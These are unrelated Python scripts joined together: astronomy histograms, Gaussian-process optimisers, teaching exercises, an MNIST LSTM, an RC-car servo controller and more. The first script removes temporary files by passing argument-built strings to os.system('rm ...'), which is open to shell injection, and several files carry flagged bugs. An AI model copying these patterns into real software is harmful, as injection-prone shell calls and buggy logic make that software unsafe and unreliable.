s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_\frac{zM}{r}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 15
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=31
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(4,5,19)
rangemax=10
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(4,5,19)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_\frac{zM^2}{r}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6, direction='up')
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 16
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
# Shared legend (anchored relative to the last axes), final layout, and save.
plt.legend(bbox_to_anchor=(1.5, 4), loc='center left', borderaxespad=0., fontsize=10)
#plt.subplots_adjust(top=0.6)
plt.tight_layout()
plt.savefig('%s_overdensities_%s_size%s_i%s.png' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), dpi=1000)
#plt.show()
# Remove the intermediate per-field list files now that the figure is saved.
# NOTE(review): os.remove() would avoid spawning a shell per file -- confirm
# there is no globbing intent before switching.
os.system("rm fieldshistW1_50_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
os.system("rm fieldshistW2_50_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
os.system("rm fieldshistW3_50_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
os.system("rm fieldshistW4_50_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
os.system("rm fieldshistW1_75_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
os.system("rm fieldshistW2_75_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
os.system("rm fieldshistW3_75_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
os.system("rm fieldshistW4_75_%s_%s_size%s_i%s.lst" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))
# Report elapsed wall-clock time only for the "samp" mode (start_time is set
# earlier in the script, outside this chunk).
if str(sys.argv[2]) == "samp":
    print(" --- %s seconds ---" % (time.time() - start_time))
print 'Done!'
|
"""
Class of strategies that are agnostic and have a joint GP.
"""
from argparse import Namespace
import numpy as np
from scipy.stats import norm as normal_distro
from strategies.joint_opt import JointOpt
from util.misc_util import sample_grid, build_gp_posterior, ei_acq, \
expected_improvement_for_norm_diff
class JointAgnosticOpt(JointOpt):
    """Agnostic joint-GP strategy: the function to query is drawn uniformly
    at random; the point within that function is chosen by the child class."""

    def _child_decide_query(self, idx):
        """Given a particular gp, decide best point to query.

        Args:
            idx: Index of GP and domain to use.

        Returns: Point on GP to query.
        """
        raise NotImplementedError('To be implemented in child.')

    def decide_next_query(self):
        """Make a query that decides which function and which point.

        Returns: Index of functions selected and point to query.
        """
        chosen = np.random.randint(len(self.fcns))
        # Refresh the posterior of the chosen GP before picking a point on it.
        build_gp_posterior(self.gps[chosen])
        return chosen, self._child_decide_query(chosen)
"""
IMPLEMENTATIONS
"""
class JointAgnThompson(JointAgnosticOpt):
    """Agnostic strategy that selects points by Thompson sampling."""

    def _child_decide_query(self, idx):
        """Given a particular gp, decide best point to query.

        Args:
            idx: Index of GP and domain to use.

        Returns: Point on GP to query.
        """
        prefix = self.f_locs[idx]
        # Random candidate grid over the function's domain, each point
        # prefixed with the function's location coordinates.
        candidates = sample_grid([prefix], self.domains[idx],
                                 self.options.max_opt_evals)
        draw = self.gps[idx].draw_sample(candidates).ravel()
        winner = np.argmax(draw)
        # Strip the location prefix; return only the in-domain coordinates.
        return candidates[winner, len(prefix):]

    @staticmethod
    def get_opt_method_name():
        """Get type of agnostic method as string."""
        return 'ja-thomp'
class JointAgnEI(JointAgnosticOpt):
    """Agnostic strategy that selects points by Expected Improvement (EI)."""

    def _child_decide_query(self, idx):
        """Given a particular gp, decide best point to query.

        Args:
            idx: Index of GP and domain to use.

        Returns: Point on GP to query.
        """
        gp = self.gps[idx]
        f_idx = idx
        curr_best = self.curr_best[self.f_names[f_idx]][-1][0]
        # FIX: index domain/locations by f_idx (was hard-coded 0),
        # matching JointAgnThompson's per-index lookup.
        ei_pts = sample_grid([self.f_locs[f_idx]], self.domains[f_idx],
                             self.options.max_opt_evals)
        mu, sigma = gp.eval(ei_pts, include_covar=True)
        # FIX: the covariance diagonal is a variance; take sqrt to get the
        # posterior standard deviation before normalizing.
        sigma = np.sqrt(sigma.diagonal().ravel())
        norm_diff = (mu - curr_best) / sigma
        # FIX: standard EI is sigma * (z * Phi(z) + phi(z)); the original
        # computed z + Phi(z) + phi(z), which is not the EI criterion.
        eis = sigma * (norm_diff * normal_distro.cdf(norm_diff)
                       + normal_distro.pdf(norm_diff))
        pt_idx = np.argmax(eis)
        # Strip the location prefix; return only the in-domain coordinates.
        return ei_pts[pt_idx, len(self.f_locs[f_idx]):]

    @staticmethod
    def get_opt_method_name():
        """Get type of agnostic method as string."""
        return 'ja-ei'
# Registry of the available joint-agnostic strategies.
ja_strats = [
    Namespace(name=strat_cls.get_opt_method_name(), impl=strat_cls)
    for strat_cls in (JointAgnThompson, JointAgnEI)
]
|
from time import sleep
def naC(temp):
    """Convert a temperature from Fahrenheit to Celsius."""
    ratio = 5 / 9
    return ratio * (temp - 32)
def naF(temp):
    """Convert a temperature from Celsius to Fahrenheit."""
    return temp * (9 / 5) + 32
# Interactive menu loop: repeats until the user enters anything other
# than '1' or '2'.  (Prompts and messages are in Polish.)
while(True):
    opcja = input("1.Zamiana [°C] na [°F]\n2.Zamiana [°F] na [°C]\nWpisz cokolwiek innego by zakończyć program:\n")
    if opcja == '1':
        # Celsius -> Fahrenheit, rounded to 2 decimal places.
        temp = int(input("Podaj temp w [°C]: "))
        print(temp, "[°C] = ", round(naF(temp),2), "[°F]\n")
        sleep(.400)  # brief 0.4 s pause before redisplaying the menu
    elif opcja == '2':
        # Fahrenheit -> Celsius, rounded to 2 decimal places.
        temp = int(input("Podaj temp w [°F]: "))
        print(temp, "[°F] = ", round(naC(temp),2), "[°C]\n")
        sleep(.400)
    else:
        # Any other input ends the program ("Koniec" = "The end").
        print("Koniec")
        break
# 机试题
# 1.lis = [['哇',['how',{'good':['am',100,'99']},'太白金星'],'I']] (2分)
# lis = [['哇', ['how', {'good': ['am', 100, '99']}, '太白金星'], 'I']]
# o列表lis中的'am'变成大写。(1分)
# lis[0][1][1]['good'][0] = lis[0][1][1]['good'][0].upper()
# print(lis)
# o列表中的100通过数字相加在转换成字符串的方式变成'10010'。(1分)
# lis[0][1][1]['good'][1] = str(lis[0][1][1]['good'][1] + 9910)
# print(lis)
# # 2.dic = {'k1':'v1','k2':['alex','sb'],(1,2,3,):{'k3':['2',100,'wer']}} (3分)
# dic = {'k1': 'v1', 'k2': ['alex', 'sb'], (1, 2, 3,): {'k3': ['2', 100, 'wer']}}
# o将'k3'对应的值的最后面添加一个元素'23'。(1分)
# dic[(1, 2, 3,)]['k3'].append('23')
# print(dic)
# o将'k2'对应的值的第0个位置插入元素'a'。(1分)
# dic['k2'].insert(0, 'a')
# print(dic)
# o将(1,2,3,)对应的值添加一个键值对'k4','v4'。(1分)
# dic[(1, 2, 3,)].setdefault('k4', 'v4')
# print(dic)
# 3.实现一个整数加法计算器(多个数相加):(5分)
# 如:content = input("请输入内容:") 用户输入:5+9+6 +12+ 13,然后进行分割再进行计算。
# content = input('请输入内容')
# con1 = content.split('+')
# s = 0
# for i in con1:
# s += int(i)
# print(s)
# 4.请写一个电影投票程序。现在上映的电影列表如下:(10分)
# Candidate movie titles for the voting exercise (exercise 4) below.
lst = ['复仇者联盟4', '驯龙高手3', '金瓶梅', '老男孩', '大话西游']
# 由用户给每⼀个电影投票.最终将该⽤户投票信息公布出来。
# 要求:
# o用户可以持续投票,用户输入序号,进行投票。比如输入序号 2,给金瓶梅投票1。
# o每次投票成功,显示给哪部电影投票成功。
# o退出投票程序后,要显示最终每个电影的投票数。
# 建议最终投票的结果为这种形式:
# {'⾦瓶梅': 0, '复仇者联盟4': 0, '驯龙高手3': , '老男孩': 0,'大话西游':0}
# dic = dict.fromkeys(lst, 0)
# print(dic)
# while True:
# select1 = input('请输入你想要投票电影的序号/按q/Q退出')
# if select1.upper() == 'Q':
# break
# dic[lst[int(select1)]] += 1
# print(f'给{lst[int(select1)]}投票成功')
# print(dic)
#
# 5.有文件t1.txt里面的内容为:(10分)
# id,name,age,phone,job
# 1,alex,22,13651054608,IT 2,wusir,23,13304320533,Tearcher 3,taibai,18,1333235322,IT
# 利用文件操作,将其构造成如下数据类型。
# [{'id':'1','name':'alex','age':'22','phone':'13651054608','job':'IT'},......]
# l1 = []
# l2 = []
# l3 = []
# with open('t1', mode='r', encoding='utf-8') as f1:
# ret = f1.readlines()
# l1 = ret[0].strip().split(',')
# l2 = ret[1].strip().split(' ')
# for i in l2:
# ret1 = i.strip().split(',')
# dic1 = {l1[j]:ret1[j] for j in range(len(l1))}
# l3.append(dic1)
#
# print(l3)
# 6.按要求完成下列转化。(10分)
# Exercise 6: collapse list3 (one dict per (name, hobby) pair) into the
# list4 shape (one dict per name carrying a hobby_list).  The grouping
# below is data-driven, so extending list3 with new records keeps working.
list3 = [
    {"name": "alex", "hobby": "抽烟"},
    {"name": "alex", "hobby": "喝酒"},
    {"name": "alex", "hobby": "烫头"},
    {"name": "alex", "hobby": "Massage"},
    {"name": "wusir", "hobby": "喊麦"},
    {"name": "wusir", "hobby": "街舞"},
    {"name": "wusir", "hobby": "出差"},
]
list4 = [
    {"name": "alex", "hobby_list": ["抽烟", "喝酒", "烫头", "Massage"]},
    {"name": "wusir", "hobby_list": ["喊麦", "街舞","出差"]},
]
l1 = []
# Index each grouped record by name so lookups are O(1); l1 keeps the
# first-seen order of names, matching the expected list4 ordering.
grouped_by_name = {}
for record in list3:
    person = record['name']
    if person in grouped_by_name:
        grouped_by_name[person]['hobby_list'].append(record['hobby'])
    else:
        entry = {'name': person, 'hobby_list': [record['hobby']]}
        grouped_by_name[person] = entry
        l1.append(entry)
print(l1)
|
import acqua.aqueduct as aq
import acqua.label as al
import acqua.labelCollection as coll
# Select the water-utility ("gestore") dataset and point the acqua
# package's environment at it.
gestore = "ACAMLaSpezia"
aq.setEnv('Liguria//'+gestore)
dataReportCollectionFile = 'Metadata/DataReportCollection.csv'
geoReferencedLocationsListFile = 'Metadata/GeoReferencedLocationsList.csv'
# Build JSON labels from the report/location metadata and display them.
fc = al.createJSONLabels(gestore,dataReportCollectionFile,geoReferencedLocationsListFile)
coll.display(fc)
import pandas as pd
# Inspect the range of the residuo_fisso (fixed residue) column.
# NOTE(review): the bare tuple expression below only shows its value in a
# REPL/notebook; wrap it in print() if run as a script.
data = pd.read_csv('Metadata/DataReportCollection.csv')
data.residuo_fisso.min(),data.residuo_fisso.max()
import matplotlib as mpl
import matplotlib.pyplot as plt
plt.plot(data.residuo_fisso)
# /usr/bin/python
# -*- encoding:utf-8 -*-
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
from tensorflow.contrib.rnn import BasicLSTMCell
from tensorflow.contrib.rnn import MultiRNNCell
from tensorflow.contrib.rnn import static_bidirectional_rnn
from tensorflow.contrib.layers import fully_connected
import numpy as np
# Load MNIST with one-hot labels (TF 1.x tutorial helper).
mnist = input_data.read_data_sets('../../MNIST_data/', one_hot=True)
# Each 28x28 image is fed as a sequence of 28 rows of 28 pixels.
n_input = 28
n_steps = 28
n_hidden = 128
n_classes = 10
x = tf.placeholder('float', [None, n_steps*n_input])
y = tf.placeholder('float', [None, n_classes])
# Reshape flat pixels to (batch, steps, features), then split into the
# per-timestep list required by the static RNN API.
x1 = tf.reshape(x, [-1, 28, 28])
x1 = tf.unstack(x1, n_steps, 1)
# Forward and backward cells of the bidirectional LSTM.
lstm_fw_cell = BasicLSTMCell(n_hidden)
lstm_bw_cell = BasicLSTMCell(n_hidden)
outputs, _, _ = static_bidirectional_rnn(lstm_fw_cell, lstm_bw_cell, x1, dtype=tf.float32)
# output = tf.concat(outputs, 2)
# Classify from the final timestep's concatenated fw+bw output.
pred = fully_connected(outputs[-1], n_classes, activation_fn=None)
# NOTE(review): summed squared error is unusual for one-hot classification;
# softmax cross-entropy is the conventional loss — confirm intent.
cost = tf.reduce_mean(tf.reduce_sum(tf.square(pred - y)))
global_step = tf.Variable(0, trainable=False)
initial_learning_rate = 0.01
learning_rate = tf.train.exponential_decay(initial_learning_rate,
                                           global_step=global_step,
                                           decay_steps=3,
                                           decay_rate=0.9)
# NOTE(review): add_global is never run in the session below, so
# global_step stays 0 and the learning rate never actually decays.
add_global = global_step.assign_add(1)
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
training_epochs = 1
batch_size = 100
display_step = 1
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    for epoch in range(training_epochs):
        avg_cost = 0
        total_batch = int(mnist.train.num_examples/batch_size)
        for i in range(total_batch):
            batch_xs, batch_ys = mnist.train.next_batch(batch_size)
            # output_ = sess.run(outputs, feed_dict={x: batch_xs, y: batch_ys})
            # print('outputs shape:', np.shape(output_))
            # print(outputs)
            # print('states shape:', np.shape(states))
            # print(states)
            # y_pred = sess.run(pred, feed_dict={x: batch_xs, y: batch_ys})
            # print('predicted y:\n', y_pred.shape, '\n')
            #
            # print(batch_xs.shape)
            _, c = sess.run([optimizer, cost], feed_dict={x: batch_xs, y: batch_ys})
            avg_cost += c / total_batch
        if (epoch + 1) % display_step == 0:
            print('epoch= ', epoch+1, ' cost= ', avg_cost)
    print('finished')
    # Evaluate classification accuracy on the held-out test set.
    correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    print('test accuracy: ', accuracy.eval({x: mnist.test.images, y: mnist.test.labels}))
    # print('train accuracy: ', accuracy.eval({x: mnist.train.images, y: mnist.train.labels}))
|
# CarControl.py
#
from serial import Serial
from threading import Timer
class CarControl:
    """Drives up to three RC cars through an Arduino-attached servo board.

    Each car has an 'x' (steering) and a 'y' (throttle) servo channel.
    Commands go over a serial link as 3-byte packets:
    a 0xFF marker byte, the servo number, then the angle (0-180).
    This module is Python 2 (print statements).
    """

    def __init__(self, comport):
        self.comport = comport
        # Servo channel assignments per car id.
        self.cars = {
            1: {'x-servo':1, 'y-servo':2},
            2: {'x-servo':3, 'y-servo':4},
            3: {'x-servo':5, 'y-servo':6}
        }
        # Named direction presets mapped to (steering, throttle) angles;
        # 'S' (90/90) is the neutral/stop position.
        self.directions = {
            'S': {'x-servo-val':90, 'y-servo-val':90},
            'F': {'x-servo-val':120, 'y-servo-val':90},
            'B': {'x-servo-val':60, 'y-servo-val':90},
            'FL': {'x-servo-val':120, 'y-servo-val':70},
            'FR': {'x-servo-val':120, 'y-servo-val':100},
            'BL': {'x-servo-val':60, 'y-servo-val':100},
            'BR': {'x-servo-val':60, 'y-servo-val':70}
        }
        self.arduino = Serial(self.comport, 115200, timeout=1)

    def move(self, car, direction, duration=500):
        """Steer then drive `car` in `direction`; schedule a stop after
        `duration` milliseconds (plus a fixed offset, see note below)."""
        xservo = self.cars[car]['x-servo']
        yservo = self.cars[car]['y-servo']
        xval = self.directions[direction]['x-servo-val']
        yval = self.directions[direction]['y-servo-val']
        # steer first...
        #print "xservo %d %d" % (xservo, xval)
        self.moveServo(xservo, xval)
        # then hit the gas!
        #print "yservo %d %d" % (yservo, yval)
        self.moveServo(yservo, yval)
        # stop the car after given duration
        # NOTE(review): the timer fires 10 s + duration/1000 s from now;
        # confirm the fixed 10-second offset is intentional.
        print "stopping after %d" % (duration)
        t = Timer(10 + float(duration)/1000, self.stop, [car])
        t.start()

    def stop(self, car):
        """Return both of `car`'s servos to the neutral ('S') angles."""
        print "stopping car %d" % car
        xservo = self.cars[car]['x-servo']
        yservo = self.cars[car]['y-servo']
        xcentre = self.directions['S']['x-servo-val']
        ycentre = self.directions['S']['y-servo-val']
        # Cut the throttle before re-centring the steering.
        self.moveServo(yservo, ycentre)
        self.moveServo(xservo, xcentre)

    def moveServo(self, servo, angle):
        '''
        Moves the specified servo to the supplied angle.
        Arguments:
            servo
                the servo number to command, an integer from 1-6
            angle
                the desired servo angle, an integer from 0 to 180
        (e.g.) >>> servo.move(2, 90)
               ... # "move servo #2 to 90 degrees"
        '''
        if (0 <= angle <= 180):
            # 3-byte packet: 0xFF sync marker, servo id, angle.
            self.arduino.write(chr(255))
            self.arduino.write(chr(servo))
            self.arduino.write(chr(angle))
            print "servo %d: %d" % (servo,angle)
        else:
            print "Servo angle must be an integer between 0 and 180.\n"
|
#!/usr/bin/python
import pprint, sys, time
import dbus, flimflam
# Require the target service name (substring) on the command line.
if (len(sys.argv) < 2):
    print "Usage: %s <service_name>" % (sys.argv[0])
    sys.exit(1)
flim = flimflam.FlimFlam(dbus.SystemBus())
# Poll for up to 30 seconds for a service whose Name contains the argument.
timeout = time.time() + 30
while time.time() < timeout:
    service = flim.FindElementByPropertySubstring('Service',
                                                  'Name',
                                                  sys.argv[1])
    if service:
        break
    time.sleep(.5)
# The loop always runs at least once, so `service` is defined here.
if service is None:
    print "Unknown service %s" % sys.argv[1]
    sys.exit(2)
# Attempt the connection and report the outcome plus any diagnostics.
(success, diagnostics) = flim.ConnectService(service=service)
print 'Success:', success
pprint.pprint(diagnostics)
|
# Løsning basert på gradient descent
from numpy import *
def f(k, n):
    """Exponential term e**(k/n) - 1 (zero at k == 0)."""
    return e ** (k / n) - 1

def E(X, n):
    """Absolute error between the sum of the four f-terms of X and pi."""
    total = 0
    for i in range(4):
        total = total + f(X[i], n)
    return abs(total - pi)
'''
def E_grad(X, n):
s = sign(f(X[0], n) + f(X[1], n) + f(X[2], n) + f(X[3], n) - pi)
pDE_a = (s*e**(X[0]/n)/n)
pDE_b = (s*e**(X[1]/n)/n)
pDE_c = (s*e**(X[2]/n)/n)
pDE_d = (s*e**(X[3]/n)/n)
return array([pDE_a, pDE_b, pDE_c, pDE_d])
'''
def E_grad(X, n):
    """Estimate the gradient of E at X by central differences.

    E(X, n) = |sum_i f(X_i, n) - pi|, so by the chain rule its gradient
    carries a factor sign(sum_i f(X_i, n) - pi).
    BUG FIX: the previous version differentiated only f and dropped that
    sign factor (the commented-out analytic gradient above includes it),
    so descent moved the wrong way whenever the sum undershot pi.
    """
    h = 1  # NOTE(review): large step size; kept to preserve existing tuning
    s = sign(f(X[0], n) + f(X[1], n) + f(X[2], n) + f(X[3], n) - pi)
    diffs = [(f(X[i] + h, n) - f(X[i] - h, n)) / (2 * h) for i in range(4)]
    return s * array(diffs)
def norm(X):
    """Euclidean norm of the first four components of X."""
    return sqrt(sum(X[i] ** 2 for i in range(4)))
# Problem scale and (aggressive) step size for the descent.
n = 200
gamma = 10  # NOTE(review): very large learning rate — relies on f's gradient being tiny for small X/n
Xold = array([1, 2, 3, 4])
Xnew = array([1, 2, 3, 4])
# Iterate until the error functional E drops below the tolerance.
# NOTE(review): the condition tests E(Xold) — the PREVIOUS iterate — so
# one extra step is taken after the tolerance is first met.
while E(Xold, n) > 0.000001:
    Xold = Xnew
    Xnew = Xold - gamma*E_grad(Xold, n)
    print(Xnew)
print(Xnew)
#print(E_grad(array([1, 1, 900, 1]), 200))
'''
i = 4
for a in range(i):
for b in range(i):
for c in range(i):
for d in range(i):
print(a, b, c, d)
print(E(array([a, b, c, d]), 200))
print()
'''
|
from services.detection.tf_pose.networks import get_graph_path, model_wh
from services.detection.tf_pose.estimator import TfPoseEstimator
from services.detection.fsanet_pytorch.utils import draw_axis
from services.detection.fsanet_pytorch.face_detector import FaceDetector
import onnxruntime
import torch
import tensorflow as tf
import cv2
import numpy as np
import logging
from datetime import datetime
from pathlib import Path
import sys
import os
# Silence TensorFlow's C++ logging ('3' = errors only).
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
# Module-level logger; only ERROR and above are emitted.
logger = logging.getLogger('Detection testing log.')
logger.setLevel(logging.ERROR)
class Detector():
    '''
    Human and face detection with tf-pose-estimation and headpose-fsanet-pytorch.
    tf-pose using tf2.0
    tf-pose-estimation: https://github.com/ildoonet/tf-pose-estimation
    tf-pose with tf2.0: https://medium.com/@gsethi2409/pose-estimation-with-tensorflow-2-0-a51162c095ba
    headpose-fsanet-pytorch: https://github.com/omasaht/headpose-fsanet-pytorch
    '''

    def __init__(
        self,
        fsa_net_path=os.path.join(
            'src', 'services', 'detection', 'fsanet_pytorch', 'pretrained'),
        tf_pose_type='mobilenet_thin',
        target_size=(640, 480),
        resize_out_ratio=4.0
    ):
        # fsa_net_path: directory holding the pretrained FSA-Net ONNX models.
        # tf_pose_type: which tf-pose graph to load (e.g. 'mobilenet_thin').
        # target_size: (width, height) the pose network expects.
        self.fsa_net_path = fsa_net_path
        self.tf_pose_type = tf_pose_type
        self.target_size = target_size
        # import model
        # Face detector used to crop face ROIs for the head-pose nets.
        self.face_d = FaceDetector()
        # Two FSA-Net variants; their predictions are averaged in __detect.
        self.fsa_sess1 = onnxruntime.InferenceSession(
            os.path.join(
                self.fsa_net_path,
                'fsanet-1x1-iter-688590.onnx'
            )
        )
        self.fsa_sess2 = onnxruntime.InferenceSession(
            os.path.join(
                self.fsa_net_path,
                'fsanet-var-iter-688590.onnx'
            )
        )
        # NOTE(review): trt_bool='F' is a non-empty (truthy) string —
        # confirm TfPoseEstimator expects a string flag rather than a bool.
        self.tf_pose = TfPoseEstimator(
